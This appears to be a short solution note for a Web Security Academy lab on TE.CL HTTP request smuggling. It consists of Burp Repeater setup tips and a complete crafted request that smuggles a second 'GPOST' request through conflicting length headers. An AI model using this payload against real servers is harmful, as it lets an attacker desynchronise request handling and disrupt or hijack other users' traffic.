HTTP request smuggling, basic TE.CL vulnerability
Require - uncheck "Update Content-Length" from Repeator.
Require - include the trailing sequence \r\n\r\n following the final 0. 


POST / HTTP/1.1
Host: 0ab0001a03373173c00541ab00b400f4.web-security-academy.net
Cookie: session=Xcn1u5WT8e0cmsKZBmJUy609nwZxRjKe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
tRANSFER-ENCODING: chunked

9D
GPOST / HTTP/1.1
Host: 0ab0001a03373173c00541ab00b400f4.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 8

foo=
0


